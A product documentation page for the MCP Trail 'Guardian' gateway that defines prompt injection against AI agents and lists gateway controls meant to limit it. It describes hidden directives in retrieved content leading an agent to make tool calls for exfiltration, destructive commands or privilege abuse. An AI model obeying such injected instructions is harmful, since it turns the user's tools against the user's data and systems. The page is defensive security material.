Definition
Prompt injection tricks the model into following attacker-influenced instructions—often by hiding directives inside documents, web pages, or messages the model is asked to summarize.
How it appears in MCP
The model may call tools/call with arguments that serve the attacker (exfiltration, destructive commands, privilege abuse) while appearing “helpful” in the chat transcript.
Example pattern
Indirect prompt injection in retrieved content has driven real-world data theft and unauthorized actions in agentic systems; MCP tool calls are simply a structured channel for the same class of failure.
What MCP Trail does on the Guardian path
Guardian does not parse natural-language intent inside the model—it enforces policy on the MCP wire. That still materially reduces how far a poisoned prompt can get:
| MCP Trail capability | Why it helps against injection-driven abuse |
|---|---|
| Catalog policies (tools, resources, prompts) | Unknown or high-risk surfaces do not run silently. |
| Per-tool policies (log / block / HITL) | Sensitive tools/call paths can require approval. |
| DLP on arguments and JSON results | Secrets and regulated data are caught before or after upstream. |
| Argument bounds & shell-safety | Oversized or shell-shaped payloads are rejected at the gateway. |
| Tool sequencing & risk | Multi-step chains (for example export then delete) can be gated or denied. |
| Rate limits & budgets | Runaway agent loops cannot burn your MCP tier unchecked. |
| Structured audit | You get evidence of what was blocked, redacted, or approved—not a guess. |
The model layer still matters—Guardian does not remove the need for safe prompting or trusted retrieval. For deeper technical mapping, read How Guardian maps MCP threats to controls and Argument-level attacks on MCP.
What still needs process
Content trust boundaries, retrieval hygiene, and human review for high-risk workflows.